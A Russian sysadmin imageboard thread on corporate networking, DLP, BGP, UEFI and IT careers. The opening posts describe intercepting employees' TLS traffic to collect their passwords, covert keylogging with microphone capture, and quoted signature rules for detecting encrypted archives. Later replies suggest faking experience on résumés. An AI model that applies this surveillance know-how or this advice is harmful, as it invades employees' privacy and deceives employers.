>У тебя синдром самозванца - ты явно разбираешься в своей области, не бойся нихуя и ищи работу себе по душе.

Наверное ты прав, у меня просто есть пару друзей нинздей, рядом с которыми я кажусь обычным эникеем

Вообще под вафлю надо бы выделить в этом случае отдельную подсеть, и отделить от бампинга, у наших топов вообще почти нет отношения к корп сети, только выделенные сервера в европе с функцией физического уничтожения, хотя кто их проверит. Вообще вайфай устройства в корп сети - моветон, в крайнем случае WPA2 через радиус, и то всё равно лучше нахуй
Бампать трафик ещё полезно для логинов/паролей, что бы собирать инфу по своим сотрудникам, в случае каких-то проблем, проверить кто что ворует, откаты и тп

По поводу ДЛП, можно, да, вытащить хард и открыть на другом ПК, 100% защиты нету при любом раскладе

У нас крупная сеть с миллионами клиентов, самое главное у нас персональные данные клиентов, как оператор ПерсДан согласно фз152, у нас воровство клиентов с стороны сотрудников, отсюда и есть политики на запрет копирования телефонов, шифрованных архивов, и тп
Мы лочим копирование шифрованных архивов через саму ДЛП, там есть утилита, которая делает аля слепок типа файла, и дальше, его можно переименовывать, изменять, но слепок будет один на все. Например теги винрара, взятые с оф сайта, хотя такие теги можно и самому написать, просто сняв слепок с программы:

$First4rarTag=getHexStringValue('52617221'); $First4rarBytes=getBinaryValueAt($data, 0x0, 4); assertTrue($First4rarTag == $First4rarBytes); $Second3rarTag=getHexStringValue('1A0700'); $Second3rarBytes=getBinaryValueAt($data, 0x4, 3); assertTrue($Second3rarTag == $Second3rarBytes); $EncryptedrarTag=getHexStringValue('80'); $EncryptedrarBytes=getBinaryValueAt($data, 0xA, 1); $FileHeaderFlags = getBinaryValueAt($data, 0x18, 1); $modedValue = mod($FileHeaderFlags, 8); if ($modedValue >=4) { assertTrue($modedValue >= 4); } else { assertTrue($EncryptedrarBytes == $EncryptedrarTag); }

А вот винзип
$Int1 = getHexStringValue('377ABCAF271C0004'); $Int2 = getBinaryValueAt($data, 0x0, 8); assertTrue($Int1 == $Int2);

Почтовый сервер ходит через тот же сквид с бампом, сертификат корпоративный, купленный в комодо, поэтому трафик нашей почты мы можем открыть и подписать, доступ к ОВЕ есть, остальные доступы, типа активсинка нету, для подключения из дома ВПН с РДП, РДП следит и мониторит ДЛП

26 дек, 14:25 309 1156588

>>56580

>У тебя синдром самозванца - ты явно разбираешься в своей области, не бойся нихуя и ищи работу себе по душе.

44 Кб, webm,
640x640, 0:02

Ответы56598

26 дек, 14:41 310 1156598

>>56588

>для логинов/паролей

Вот это уже опасное дело. Т.к. если что-то пойдет не так, то пользователь сможет засудить компанию за вмешательство в частную жизнь. И, насколько знаю, даже если у сотрудников в трудовом договоре прописано, что нельзя использовать рабочий инет в личных нуждах - это не дает права снифать пароли/инфу пользаков, которая не относится к их непосредственным рабочим обязанностям. При том попасть можно очень больно - у нас как-то дедка уволили незаконно, а у он оказался корешем одного крупного политика и блядь такие проверки на компанию натравил, что с ним еле договорились потом...

Про rarjpeg ты так и не ответил, кстати...

>Наверное ты прав, у меня просто есть пару друзей нинздей, рядом с которыми я кажусь обычным эникеем

Ну так это ж наоборот хорошо - есть у кого учиться. Сам тоже собираюсь уходить, но как раз в т.ч. и потому что рядом ниндзей нет.

Ответы56608 56620

26 дек, 14:53 311 1156608

>>56598

>Про rarjpeg ты так и не ответил, кстати...

Я не пробовал с ним, это интересный вопрос, можно протестить, у тебя нету под ругой раржепега, так как делать его сейчас самому, ну пиздец как лень

По поводу сбора личной информации у нас в внутренний политике ИБ, которую подписывают все, на 50 страницах 12 шрифтом написано, что-то уровня, что "компания имеет право обрабатывать любые данные, которые вы обрабатываете средствами компании", "вы даёте своё полное согласие на обработку и передачу своих персональных данных", я не помню точный текст, но оно есть. Да, сотрудники про это не знают, как правила почты уровня гугла с двухфакторной авторизацией мы не смотрим, ну я не буду тебе рассказывать, что мы смотрим, а что нет, это не суть, да, по большей части не палимся

Ещё юзаем софт, который записывает каждый клик мышки и каждое нажатие пользователя на клавиатуре с скринами, плюс микрофон, можете купить 10-15 лицензий и ставить на ПК подозреваемых

Ответы56622

26 дек, 15:06 312 1156620

>>56598
Да, проверил, нашёл на лурке, пропускает, надо снимать его дамп попробовать, и посмотреть отличия от обычного жепега

Ответы56622

1 Кб, 650x923

26 дек, 15:07 313 1156622

>>56608
Раржпег - пикрелейтид. Там внутри текстовый конфиг от q3.

>в внутренний политике ИБ, которую подписывают все, на 50 страницах 12 шрифтом написано

Так в том и фишка, что если то, какой-то пункт договора противоречит законам/конституции РФ, то он будет признан не действительным! А во всех этих юридических тонкостях хуй разберешься. Многие компании пишут туда белиберду, чтобы людей больше припугнуть.

>>56620
Ну вот я нашел дыру, лол.

Ответы56623 56626

26 дек, 15:08 314 1156623

>>56622
ЛОЛ, двач попортил раржпег.

Ответы56639

26 дек, 15:11 315 1156626

>>56622

>Раржпег - пикрелейтид.

а зачем это надо?

Ответы56633 57064

26 дек, 15:23 316 1156633

>>56626
Так раньше обменивались файлами на двачах.

Ответы57064

26 дек, 15:34 317 1156639

>>56623
Это ты коряво его склеил. Я с таки встречался. Нужно четко клеить именно формат с форматом, а не переименованные разрешения.

Ответы56679

26 дек, 15:56 318 1156679

>>56639
Делал так:
cat img.jpg 1.rar > rarjpeg.jpg
И у меня локально он отлично работает - открывается и картинка и архив.

26 дек, 16:28 319 1156733

Надо было на убунту 16 настроить xrdp пиздец 2 дня как об стену. Не работает русская раскладка и все. Я в ахуе просто, интернеты завалены похожей проблемой аж с 2009 года но никто нихуя ничего не поправил.

Так просто крик души.

Ответы56735 57218

26 дек, 16:31 320 1156735

>>56733

>xrdp

Не хочу тебя расстраивать, но и у всех vnc-серверов под линем тоже есть проблемы с работой русской раскладки.

Ответы56740 57218

26 дек, 16:31 321 1156737

Пацаны, вечер в хату. Будьте так добры, выручите советом. Необходимо получить знания по ЛВС. Имеется книга семейки Оливеров (Компьютерные сети). Так вот, годное чтиво или нет? Может лучше что то новее начать изучать?
Я сам электрик, и по работе свалилось на меня сетевое оборудование. Имеется оборудование которое работает по PRP протоколу.
Так вот, накидайте плиз чего можно почитать, что бы въехать ЛВС, желательно с азов, дабы ничего не пропустить.

Ответы56743 56745 56964 56967 56968 62871

26 дек, 16:35 322 1156740

>>56735
Блядь. Нужно было марьвановне дать доступ. Пиздец значит. У меня нервов уже не хватит. Причем сука у кого то же работает.

26 дек, 16:35 323 1156743

>>56737

>Имеется оборудование которое работает по PRP протоколу.

Это ещё что за херня?
По теме — курс ICND 1 и ICND 2

Ответы56747 56760

26 дек, 16:36 324 1156745

>>56737

>PRP

Ты ничего не путаешь? Я даже с гуглом не смог до конца понять о чем ты.

>Оливеров

Спорное произведение. Во многом устаревшее, с другой стороны оно о фундаментальных основах, который в общем и не поменялися нихуя.

Ответы56760

26 дек, 16:37 325 1156747

>>56743

>Это ещё что за херня?

>Ты ничего не путаешь? Я даже с гуглом не смог до конца понять о чем ты.

Лол я тоже не понял про что он, гуглю, тоже не понял. Ну лан думаю я долбоеб наверное. А оказывается нет. Может опечатался.

Ответы56751

26 дек, 16:39 326 1156751

>>56747

>Лол я тоже не понял про что он, гуглю, тоже не понял. Ну лан думаю я долбоеб наверное. А оказывается нет. Может опечатался.

Я-то сетевиком работаю, но не слышал про

>PRP

Ответы56755 56761

26 дек, 16:43 327 1156755

>>56751
Я как бы тоже.

Ответы56761

50 Кб, 600x273

26 дек, 16:44 328 1156760

>>56743

>По теме — курс ICND 1 и ICND 2

Это я так понимаю за деньги?
Мне бы пока что бесплатно начать въезжать.
>>56745

>Ты ничего не путаешь? Я даже с гуглом не смог до конца понять о чем ты.

Parallel Redundancy Protocol.

>Спорное произведение.

Так стоит ли читать? Может чего поновее изучить? Не хочется время зря терять. Может в ЛВС есть какой-нибудь must have?

Ответы56763

26 дек, 16:44 329 1156761

>>56751
>>56755
ВОН ИЗ ПРОФЕССИИ!!!11

Ответы56770

26 дек, 16:46 330 1156763

>>56760

>Это я так понимаю за деньги?

>Мне бы пока что бесплатно начать въезжать.

Не, можно скачать на торрентах. Есть вроде бы на русском. Т.к ты не сетевик и тебе скорее всего не нужно углубляться в работу всяких протоколов маршрутизации, достаточно будет этого. Или книгу по подтоговке к CCNA можешь погуглить.
А можешь посмотреть на ютубчике СДСМ, первые 6-7 видео

Ответы56773

26 дек, 16:51 331 1156770

>>56761
Окай.

26 дек, 16:51 332 1156773

>>56763

>СДСМ

Благодарю, походу это то что надо.

26 дек, 17:22 333 1156822

Посоны, как nmap узнаёт аптайм у сервера? Сканирую свою vps, а там указано прям сколько дней она подряд работала.

26 дек, 18:56 334 1156951

Что то аноны, устроился на большой бабос, за 42 часа, поспал 4. Мне то похуй, я то не женатый, а как другие тут работают, я хуй знает.

26 дек, 19:15 335 1156962

>>56233
Ммм. Chubby? BBW? Или сразу PLUMP?

26 дек, 19:17 336 1156964

>>56737
ХАРДОВЫЙ ЭЛЕКТРИК РЕШИЛ ВКАТИТЬСЯ В ЛВС
@
ПЕРВОЕ ПРАКТИЧЕСКОЕ ЗАДАНИЕ - РАЗВОДКА КОННЕКТОРОВ
@
ПО ПРИВЫЧКЕ ПРИКРУЧИВАЕТ ФАЗУ С НУЛЁМ

26 дек, 19:21 337 1156967

>>56737
https://en.wikipedia.org/wiki/Parallel_Redundancy_Protocol
Вкинь, пожалуйста, модели того оборудования, которое на тебя свалилось.

Ответы56991

26 дек, 19:21 338 1156968

>>56737
https://www.cisco.com/c/en/us/td/docs/switches/lan/industrial/software/configuration/guide/b_prp_ie4k_5k.html
Если осилишь на английском, и если оборудование от Cisco.

Ответы56991

26 дек, 19:57 339 1156987

Ухватил за 12 баксов на год vps неплохую, два выделенных ядра проца, столько же гигабайт оперативы, 1 терабайт трафика на месяц, 50гб жёсткого диска. Но вот беда, виртуалка средствами openvz, и ещё ядро сверхдревнее.

С учётом вышесказанного, как мне добиться изоляции внутри этого сервера? Обычно я пердолю либо lxc либо докер, но внутри openvz это как я понимаю не вариант, да? Что ещё для изоляции можно использовать?

Ответы57254 57480

26 дек, 20:04 340 1156991

>>56967
Чего именно? Там куча контроллеров нижнего уровня, сервера среднего уровня, сервера скады, свичи руджеткомы и т.д. И все это объвязанно по PRP.
>>56968
Cisco нет.

26 дек, 20:40 341 1157010

>>55870

>Что до iBGP, то без IGP он как бы всё равно не заработает

Эт почему еще?

мимо-стремящийся

Ответы57069

27 дек, 01:40 342 1157034

Аноны, есть в ДС2 сменная работа для саппорта?

27 дек, 09:09 343 1157064

>>56633
>>56626
Абу пофиксил после того как так стали обмениваться центральными процессорами
Вообще так до сих пор обмениваются центральными процессорами, только не на аиб

Ответы57069

27 дек, 09:21 344 1157069

>>57010
BGP - протокол для чего? Для обмена маршрутной информацией между автономными системами. Это его основное предназначение. Внутри AS нет никаких других AS (конфедерации мы сейчас не рассматриваем), поэтому iBGP внутри AS используется только для передачи маршрутной информации полученной из внешних AS, т.е. предназначение iBGP - помогать работать eBGP, они всегда работают в связке и iBGP отдельно применяться просто не может. Соответственно, внутри AS мы всё равно используем какой-то из протоколов IGP, чтобы наша сеть была сетью, а не набором узлов и проводов.

Если вдаваться в технические детали, то для BGP, как и для любого другого протокола маршрутизации критически важна доступность next-hop. Если он недоступен, то маршруты ни в RIB, ни в CEF никогда не попадут. Что такое next-hop для eBGP? Это сосед от которого были получены маршруты, т.е. мы проверяем фактически достижимость соседней AS. Для eBGP всё понятно: если некст хоп недоступен, маршруты от него пропадут после падения сессии. А кто будет для маршрутизатора iBGP next-hop? Классический вариант: next-hop будет всё тот же внешний сосед(!) и специальный случай: можно перенастроить пограничный eBGP/iBGP маршрутизатор, чтобы он указывал в качестве next-hop самого себя.

Так вот в классическом случае, чтобы маршруты полученные по BGP попали в RIB/CEF важно, чтобы next-hop УЖЕ был доступен на всех iBGP маршрутизаторах, а как это может быть, если информация о нем приходит по самому iBGP? Никак. Значит, мы должны ее получить по IGP протоколу! Т.е. на нашем граничном BGP маршрутизаторе н>>57010
ужно сделать редистрибьюцию BGP next-hop адреса (и только его!) в IGP протокол, где указать, что этот самый next-hop внутри нашей сети доступен через наш же пограничный BGP маршрутизатор.

>>57064
Лучше б он капчу пофиксил, мудень, блядь, а от стеганографии всё равно нет способа защититься.

Ответы57073 57076

27 дек, 09:37 345 1157073

>>57069
Я вот тоже что-то не понял, отчего BGP не может работать без IGP. У нас работает, например.

Ответы57082

27 дек, 09:39 346 1157076

>>57069

>из протоколов IGP, чтобы наша сеть была сетью, а не набором узлов и проводов.

IGP внутри сети не используем, потому как топология звезда, где ЦОД в центре. Статика используется в основном.

Ответы57082

27 дек, 09:45 347 1157082

>>57073
Ну я тогда даже ХЗ, как еще понятнее объяснить... BGP и IGP просто имеют разные назначения.

>>57076
Статика - сорт оф IGP.

27 дек, 15:03 348 1157144

Какой-то блять пиздец это ебучее IT, работаю сисадмином(по сути devops+хуй с картриджами(у нас нет офисного админа в конторе занимающейся бусиносом в IT сфере(не буду до конца палиться) меняем даже двери в офисе (это очень палит)) - утром выкладываешь сервисы, ебешься с докерами хуекерами, пишешь ебаный код, конфиги которые рендерят другие ебучие конфиги, лепишь мониторинг, алертинг, ищешь ошибки в коде разработчиков, потому что ты блять эксплуатация и видишь это первым, ночью будят потому что твой ебаный алертинг работает, а код нихуя, приходишь утром - бухгалтерия доебывается со своим 1С, потому что у них там какие-то ебаные блокировки с файловым 1С за который тебе не платят, и вообще есть аутсорсер(причем ебут очень настойчево), и все ездят по ушам, и думаешь такой - нахуй блять вообще ввязался в эту ебучую работу, а когда, блять, наебнется какой нибудь ceph - админы будут крайними и хуями будут крыть опять их, в пизду пацаны лучше ни за хуя не отвечать, продавать смартфоны в связном и жить с мамкой, отвечаю.

Ответы57147

27 дек, 15:16 349 1157145

Почему UEFI такое кривое говно? Вот с любой же стороны. Почему оно стало таким популярным и зачем убили BIOS?

Ответы57148

27 дек, 15:16 350 1157147

>>57144
Если ты такой скилловый чувак, нахуя сидишь на этой говноработе?

Ответы57151

27 дек, 15:19 351 1157148

>>57145
Сам ты кривое говно, а EFI вместе с GPT крутейшие штуки!

Ответы57154

27 дек, 15:41 352 1157151

>>57147
потому что на шеяке девушка, квартира и 4 кота, нужно ебашить и не отвлекаться, при перебежке на др место работы можно неприятно влететь, в общем я трусливая блядь, но выход действительно один.

Ответы57152 57153

27 дек, 15:41 353 1157152

>>57151
и не факт что там будет лучше :<

Ответы57161

27 дек, 15:44 354 1157153

>>57151
сколько платят тебе ?

27 дек, 15:48 355 1157154

>>57148
Только и читаю "круто, модно, молодёжно!". А аргументов не вижу. Только проскальзывает иногда "Да тут ТАКОЕ можно забабахать! Ух!" Но мне вот не нужно "такое". Мне нужно, чтобы был единый стандарт и всё работало как часы без танцев с бубном. Без всех этих "ой, уефи не понимает нтфс, но у меня образ больше 4Гб, щито же делать?! А, знаю, я создам посредника на одном разделе с фат, а сам образ запишу на нтфс, отключу Secure boot, для этого воспользуюсь тремя утилитами, командной строкой и скриптами на павершелле! Вау, какой я крутой! Такого франкенштейна собрал! УЕФИ КРУТО! УЕФИ ФОРЕВА! УРА! УРА! УРА!". С биосом-то всё проще: взял образ, установил его на флешку. Всё. Не успеваешь почувствовать себя крутым хацкером.

Блядь, маму абу ебал с этими бесконечными вывесками, знаками и прочим дерьмом.

Ответы57164

27 дек, 16:07 356 1157158

---
Компания Cisco предложила принципиально новое решение в этой гонке — самообучающуюся Интуитивную сеть. Чем дольше вы ее используете, тем умнее она становится, непрерывно адаптируясь к потребностям вашего бизнеса и защищаясь от угроз. Благодаря разработкам Cisco вы сможете сократить расходы и время на обслуживание, сосредоточившись на внедрении инноваций.
---
Сетевики!
Я давно говорил, что вы не нужны!
Наконец-то циска выпустила стоящий продукт, который позволит избавится от вас, как от балласта фирмы.
Сеть сама себя настроит, без вашего участия. Только коробки по этажам ставь да включай в розетку"!

Ответы57163

27 дек, 16:11 357 1157161

>>57152

>и не факт что там будет лучше :<

Везде лучше, где нет быдлоофиса. Алсо, ипотека - зло. Вангую, что работодатель о ней знает и поэтому так на тебе ездит.

27 дек, 16:14 358 1157163

>>57158
"Куплю обученную сеть"

27 дек, 16:17 359 1157164

>>57154
О чем ты вообще? Для GPT диска и UEFI загрузчика тебе нужно сделать один раздел с загрузчиком в fat-е, помеченный как EFI и один диск с системой. Нужно поставить на один хард несколько систем? Пожалуйста! Делай свой раздел с загрузчиком для каждой из них и всё! При том в GPT можно эти загрузочные разделы располагать где угодно и как угодно. Нужна безопасность? Включай секьюр бут, прописывай ключи в UEFI и в загрузчик. Более того, любой загрузчик имеет доступ к инфе о других загрузчиках и разделах, т.е. ты можешь из одного загрузчика как перейти в любой другой загрузчик, так и напрямую загрузить систему с любого размера. Ну то есть можно иметь и всего один EFI загрузочный раздел, главное, чтобы загрузчик в нем был достаточно "умным", как, например, GRUB.

Да, тот факт, что поставщики компов уже включают секьюр бут и прописывают только ключ от предустановленной винды немного путает, но в целом то они всё как раз правильно делают, просто это не всегда то, чего хочет "продвинутый" пользователь.

Ответы57166 57169

27 дек, 16:18 360 1157166

>>57164

>с любого раздела

fix

27 дек, 16:28 361 1157169

>>57164
У меня сейчас новый сервер PowerEdge T330, на который нужно поставить Hyper-V (на Windows 2016). Мать сейчас в режиме UEFI. Образ 2016 весит почти 6Гб. Я уже и так и сяк и через косяк, но сервер упорно не видит флешку. Либо я где-то затупил в настройках, либо как-то неправильно режу флешку. Зараза, давно уже этим не занимался, раньше как-то проще всё было.

Ответы57170

27 дек, 16:31 362 1157170

>>57169
iDRAC надо потому что использовать и делать установку из образа по сети. С флешки там можно загрузится, но, блядь, я не помню уже как - последний раз dell настраивал года 4 назад и оно и тогда было весьма не тривиально.

Ответы57186

27 дек, 18:04 363 1157186

>>57170
Через iDRAC он iso почему-то не видит. Пизда, пизда, огорчение.

Ответы57319

27 дек, 19:56 364 1157215

В каком разделе пердолики сидят у нас?

27 дек, 20:03 365 1157218

>>56735
Таки поставилось. Оказалось баг какой то в xrdp0.6 , воткнул 0.9 и норм. Но все равно как то не стабильно работает. Юзеру такое не дашь.

анон >>56733

27 дек, 21:44 366 1157254

>>56987
Бамп вопросу.

28 дек, 00:09 367 1157283

Анон не было новостей про CCNP ? Циска там не собирается обновлять трек в следующем году?

Ответы57316

28 дек, 08:19 368 1157316

>>57283

>Анон не было новостей про CCNP ? Циска там не собирается обновлять трек в следующем году?

да черт его знает.
Сдавать собрался? Накой?

Ответы57330

28 дек, 08:29 369 1157319

>>57186
А ты iso, случаем, не с локального диска монтируешь? По идее, iso-шник должен лежать в шаре.

Ответы57331

28 дек, 10:37 370 1157330

>>57316
Ну CCNA кончается. Ну если по треку пойдешь то повторишь все, да и дрочат еще на бумагу эту. Думаю CCNP Норм так будет.

Ответы57395 57419

28 дек, 10:44 371 1157331

>>57319
Не, с сетевого.
Я вчера таки дошаманил. Вечером уже поставил резать новую флешку, с утра попробоваk - загружается. Самое смешное, что рабочая флешка получилась самым простым способом: поставить в WinSetupFromUSB 1.8 галку "auto format" (align, copy BPB , FAT32) и указать образ.

Ответы57337

28 дек, 11:28 372 1157337

>>57331
Хотя нет, что-то тут не то. Эта флешка работает. Зарезал тем же способом другую - не работает. Вот же шайтан-машина.

28 дек, 13:55 373 1157395

>>57330

>Ну если по треку пойдешь то повторишь все

ну разве что ради этого.
На бумажку никто не дрочит. Даже выделять в резюме считаю дурным тоном.

Ответы57437

28 дек, 15:07 374 1157419

>>57330
зачем тебе эти сети? Сетевикам жить осталось 5-7 лет, дальше они вымрут за ненадобность. Это ж явно атавизм — держать сетевиков в компании.
Надо изучать либо менеджмент/бизнес-аналитику, либо в разработку ударяться. Админство это не ИТ.

Ответы57420 57437

28 дек, 15:10 375 1157420

>>57419
Ага, я прямо так себе и представляю, как заявки о падении каналов будут сами заводиться, а BGP сам настраиваться при том во всем интернете разом...

Ответы57421

28 дек, 15:12 376 1157421

>>57420

>Ага, я прямо так себе и представляю, как заявки о падении каналов будут сами заводиться

пфф....система мониторинга на что? Канал упал - системаотправляет письмо в поддержку - если канал поднялся, то отправляет письмо о том, что все работает. Проверка по пингу. В чем проблема?
BGP надо настроить один раз и более не трогать. Для этого будет 1 инженер на 100 энтерпрайзов

Ответы57422 57427

28 дек, 15:19 377 1157422

>>57421
Ты просто дилетант, поэтому такую ерунду и пишешь. В реальности падения канала не всегда можно отследить мониторингом, т.к. "падение" - это слишком общее понятие. У нас, например, провайдерский линк через L2 устройство заведен, а потом через вланы на роутер проброшен, где уже висит адрес внешний. Так вот стала прилетать бпдушка на L2 оборудовании кривая - связи нет, а линки все есть. Пока стп не отключишь, канал не работает. В чем проблема - ХЗ, мы у себя ничего не меняли, раньше всё работало. Провайдер считает, что у них всё замечательно. Два дня разбираемся и бодаемся.

Или проще случай, чтобы ты точно понял о чем я. Упала площадка - связи нет. Заводить заявку? ХУЙ! У них просто электричество отключили на полчаса...

Да, конечно, надо и L2 уровень всесторонне мониторить и с ИБП данные о пропадании электричества тоже отслеживать. Но по факту ИБП то не везде даже есть, а мониторить всё на свете - это нужно штаб отдельных людей держать, чтобы они систему в актуальном состоянии постоянно поддерживали. Как ни крути - люди нужны. Да, не 10 сетевиков, а 1-2 человека, но так их уже давно в большем количестве никто и не держит...

Ответы57425

28 дек, 15:24 378 1157425

>>57422

>вязи нет, а линки все ест>>57422

>бпдушка на L2 оборудовании кривая - связи нет, а линки все есть

а хули вы bpdu-шки провайдеровские принимаете! bdpufilter enable надо было ставить!
Это раз!
А два вот :
В любой филиал заводится два канала - резервный и активный. Мониотринг смотрит - если оба лежат, значит письмо не надо отправлять, скорее всего электричество вырубили. А если один из каналов лежит, то отправляй письмо оператору.

Ответы57426 57427 57431

28 дек, 15:26 379 1157426

>>57425

вот и всё!
И нахрен держать сетевика!
Скоро выпустят Cisco DNA и повсеместно начнут использовать — железки сами себя настроят как надо!

Ответы57427

28 дек, 15:27 380 1157427

>>57421

>BGP надо настроить один раз

А если ты провайдер?!

>>57425

>если оба лежат, значит письмо не надо отправлять

И как ты это хочешь автоматически разруливать? Например, один канал упал сразу, а другой через пару часов, потом что один ИБП на площадке таки был...

>>57426
Не настроят. Хотя бы потому что кто-то должен будет сказать им КАК им себя настраивать. Ну там тот же lldp включить на цисках на доступе, чтобы ip-телефония от avaya заработала...

Ответы57428

28 дек, 15:31 381 1157428

>>57427

>Не настроят. Хотя бы потому что кто-то должен будет сказать им КАК им себя настраивать. Ну там тот же lldp включить на цисках на доступе, чтобы ip-телефония от avaya заработала...

Интегратор один раз сделает и забудет.

>И как ты это хочешь автоматически разруливать? Например, один канал упал сразу, а другой через пару часов, потом что один ИБП на площадке таки был...

А почему вы так реализовали отказоусйчивость, что у вас ИБП обечпечивает только один канал?!

Ответы57430

28 дек, 15:37 382 1157430

>>57428

>Интегратор

ЛОЛ, а с чего ты взял, что в примере выше про бпдушку это настроил не он, а местные админы? Интегратору намного больше плевать на ошибки в конфигурировании, чем локальным сетевикам.

>вы так реализовали отказоусйчивость

Мы просто в год покупаем с десяткой другой мелких бизнесов и они становятся нашими филиалами. Покупаем как есть, а приведение к единым стандартам - это процесс на месяцы и годы.

Твои высказывания и вопросы показывают, что ты либо глупый траль, либо абсолютно не знаком с реалиями ведения бизнеса в России. И честно сказать, я даже не знаю что хуже...

Ответы57433 57436

28 дек, 15:59 383 1157431

>>57425
Это не наша и не провайдерская бпдушка как сейчас выяснилось. Просто провайдер арендует последнюю милю у какого-то местечкового мелко-провайдера, вот его то оборудование и начало себя вести неадекватно.

70 Кб, 1280x596

28 дек, 16:19 384 1157432

Говорила мне мама "не еби вола, получай сертификаты!"

Ответы59040

28 дек, 16:21 385 1157433

>>57430

> Интегратору намного больше плевать на ошибки в конфигурировании, чем локальным сетевикам.

Трустори

Ответы57434

28 дек, 16:22 386 1157434

>>57433
Нам вообще на все поебать, если совсем честно.
мимо из интегратора

Ответы57439

28 дек, 16:39 387 1157435

тест капчи

28 дек, 16:41 388 1157436

>>57430

>Твои высказывания и вопросы показывают, что ты либо глупый траль, либо абсолютно не знаком с реалиями ведения бизнеса в России. И честно сказать, я даже не знаю что хуже...

Хорошо, сетевики! Вот что вы делаете в моменты, когда не открывается новых офисов, не ставится новое оборудование? Пердолите iptables? vlan на портах прописываете?! Тьфу, блять!

Ответы57438

28 дек, 16:45 389 1157437

>>57395
Дрочат дрочат. А в интеграторах так вообще обязательно ее иметь. HR пройти поможет еще, а там уже тащишь знаниями. Еще экзамен эта такая интересная штука, как будто на собеседование сходил, спрашивают всякие вещи которые ты не ожидал. Считаю это дело чрезвычайно полезным.
>>57419
Ну я python учу еще. Будем еба SDN рулить же.

28 дек, 16:46 390 1157438

>>57436

>что вы делаете в моменты, когда не открывается новых офисов, не ставится новое оборудование?

В интеграторах/провайдерах таких моментов вообще нет - там постоянная и непрерывная движуха. В хорошем энтерпрайзе - занимаешься развитием мониторинга, ходишь на обучение, приводишь всё ранее купленное к единому знаменателю. Если совсем становится тухло, то меняешь работу - вакансий на рыке просто овер дохуя.

Олсо сам планирую сходить на два фастлайновских курса: NPDESI и NPDEV - первый это программирование для сетевиков, второй - это сети для программистов. Там как раз обучают тому что ты нам всем тут пророчишь. Но есть у меня опасения, что эти курсы окажутся слишком таки поверхностными для меня, а узнать не у кого, т.к. по словам препода - они в рашке не популярные очень, хотя в Европе на них народ валит валом...

28 дек, 16:47 391 1157439

>>57434
Двачую. Интеграторы такие ошибки бывает допускают что просто пиздец. И им за это нихуя не бывает, потому как бабки пилятся на самом верху между своих, а простых ишаков никто не трогает.

Screenshot2017-12-28-20-20-43-113ru.superjob.client.android.png

122 Кб, 1080x1920

28 дек, 18:28 392 1157453

Анон, что делать если я накидался базовой инфой, опыта работы нет, а вместо вакансий пикрилейтед? Везде нужен стаж.

Ответы57463

28 дек, 19:43 393 1157463

>>57453

>Анон, что делать если я накидался базовой инфой, опыта работы нет, а вместо вакансий пикрилейтед? Везде нужен стаж.

пиздеть на собеседовании. Нарисовать левый опыт в резюме

Ответы57464 57581

28 дек, 19:45 394 1157464

>>57463
Двачую этого. По другому не влезть, либо очень очень редкая вакансия будет без опыта за еду.

28 дек, 21:41 395 1157480

>>56987
Снова бамп вопросу.

29 дек, 11:26 396 1157581

>>57463
Так это ж можно обосраться, если возьмут, а ты чего-то элементарного не умеешь. Мало ли, упустил.

Ответы57582

29 дек, 11:28 397 1157582

>>57581

>Так это ж можно обосраться, если возьмут, а ты чего-то элементарного не умеешь. Мало ли, упустил.

Не парься на этот счет. На той работе, на которую ты претендуешь, всё что угодно можно нагуглить или спросить на форуме.

175 Кб, 1280x980

29 дек, 12:27 398 1157589

Не могу создать виртуальный свитч на Hyper-V 2016. Это у меня руки кривые и где-то что-то забыл настроить, или просто рандомный глюк?

Ответы57827

30 дек, 02:56 399 1157822

30 дек, 06:03 400 1157827

>>57589
Ну так ты в логах смотрел?

31 дек, 14:03 401 1158208

Год назад впервые пришла идея походить на собеседования и попробовать устроиться в московские системные интеграсты.
Охуел от зарплат - это реально пиздец, за 90-110к рвать жопу с постоянными переработками.
Причём в одном месте мне прямо сказали: больше тебе никто не даст, сейчас в ойти везде такие зарплаты. Наглый пиздёж, если слышите такое - сразу разворачивайтесь и уходите.
Сама техническая часть собеседования тривиальна. Вопросы могут быть и очень простые, и сравнительно сложные. На одном из собеседований у меня одновременно спрашивали и сайзинг Lync Server на 100к юзеров, и для чего нужна маска подсети. Энивей, если вы средне знаете материал, то вы ответите на всё.
Реалии работы везде немного разные, но в целом системный интегратор это ональное рабство. Вы работаете с людьми, у которых зачастую уже развилась деперсонализация от постоянных стрессов. Погонщик орёт что надо вчера. Заказчик брызгает слюной и орёт на переговорах что вы все пидарасы ёбаные и вам пиздец. Текучка кадров, как правило, очень серьёзная.
Да, вот ещё, требовать от вас будут реально много. Подвачевать капчу не удастся. Вы будете не успевать ничего. Платить вам за это будут вышеупомянутую сумму. Плюс оплата за переработки. То есть вы обходитесь конторе крайне дёшево.
Поработал в итоге полгода в одном из интеграторов. Когда почувствовал отвращение к админству, то уволился и нашёл другую работу. Теперь всё нормально, интерес к профессии снова появился.
Что-то ещё хотел написать, забыл.

Ответы58278 58531 58540

31 дек, 14:47 402 1158238

всех с наступающим

я вообще 1го работаю

правда выбил работу из дома. че поделать, сменный график, сэр

31 дек, 17:25 403 1158278

>>58208

> Да, вот ещё, требовать от вас будут реально много. Подвачевать капчу не удастся. Вы будете не успевать ничего.

На самом деле это сильное заблуждение.
Поработал в нескольких крупных компаниях (в интеграторах в том числе), практически никто в полную силу не работает. Абсолютное большинство айтишников работает либо медленно (не хватает ума или не могут оптимизировать свой рабочий процесс), либо сознательно тратят время на хуйню (чай-кофе, синьюс-рбк-хабрахабр). Эти люди как раз будут рассказывать как много работы и они ничего не успевают.

Я сам довольно ленивый, всё откладываю на последний момент, при этом всегда отвечаю за обозначенные мною сроки и делаю задачи вовремя. Меня считают лучшим инженером в отделе и периодически повышают должность и зарплату. Даже интересно, что было бы, если бы я выкладывался сильнее.

Среди интеграторов, жёстко эксплуатирующих работников, всегда отмечают Крок. Не знаю насколько это правда, но мнение очень популярное. Могу порекомендовать только обходить стороной эту компанию. В других виденных мною компаниях всё как я написал в первом абзаце (несмотря на ужасные отзывы).

Ответы58476

1 янв, 14:21 404 1158476

>>58278

>Абсолютное большинство айтишников работает либо медленно

Ну уж в интеграторах точно не имеет смысла работать быстрее определённой, эээ, скорости работы. Потому что её там всегда дохуя, сделал одно - нагрузили другим.

Ответы58488

1 янв, 14:42 405 1158488

>>58476
И что в этом плохого? Будут нагружать разными задачами, более важными и ответственными. Это опыт, и соответственно повышение или больше возможностей при смене работы.
Если человек активен, ответственен и не полный мудак в общении, его никто не будет годами держать на одной и той же позиции с одинаковыми задачами.

Ответы58496

1 янв, 15:12 406 1158496

>>58488
